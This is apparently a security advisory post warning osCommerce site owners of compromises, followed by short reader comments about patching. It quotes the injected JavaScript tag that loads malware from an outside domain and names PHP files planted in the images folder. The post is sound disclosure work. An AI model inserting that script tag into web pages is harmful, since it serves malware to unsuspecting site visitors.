If you are an osCommerce user, please make sure to update your installation (and check your sites) as soon as possible. We have been tracking multiple compromises of osCommerce installations where the attackers added this javascript malware to the affected sites:
< script src = “http://nt02.co.in/3” >
This code is used to load malware to unsuspecting visitors of your site. Most of the sites affected also had a few PHP files inserted inside the /images folder, generally called inclasses.php, loadclasses.php or phpclasses.php.
We are still researching how those sites got hacked and which vulnerability was used. It could be this one, or some of the others recently published.
If you have more information let us know.
Harshad Mane
Denis Sinegubko
Juliana Lewis
Krasimir Konov
Yuliyan Tsvetkov
John Castro
Ben Martin
Daniel Cid
Stephen Johnston
7 comments
what do you mean update the installation. are there new files that will prevent this? i had one get hit, but i have others that i want to try and prevent from getting it.
there is no new installation files, latest version is still 2.2 rc 2A.
I’m using osCommerce and was not effected by this, most likely because I followed all of these steps to protect my site.
http://forums.oscommerce.com/topic/313323-how-to-secure-your-site/
one of them is to remove the file_manager.php. This is a known security flaw with osCommerce yet they don’t remove it from the default installation for some reason.
Comments are closed.